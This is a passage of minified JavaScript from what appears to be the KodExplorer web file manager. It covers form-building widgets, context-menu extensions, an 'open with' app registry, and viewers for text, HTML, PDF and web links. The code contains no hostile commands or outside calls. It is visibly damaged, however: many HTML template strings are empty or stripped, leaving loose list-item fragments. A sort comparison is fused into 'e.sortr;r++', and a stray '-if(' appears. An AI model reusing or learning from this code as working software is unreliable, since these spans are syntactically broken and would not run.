e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
      ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
    • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
    • '+r(o.icon)+""+d+"
    • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p}; -if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
      ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
      ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
      '+LNG.unknow_file_tips+"
      "+t+'
      2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
      3.'+r+o+'">'+LNG.unknow_file_download+'
      '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
      ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:-1,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("url"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var 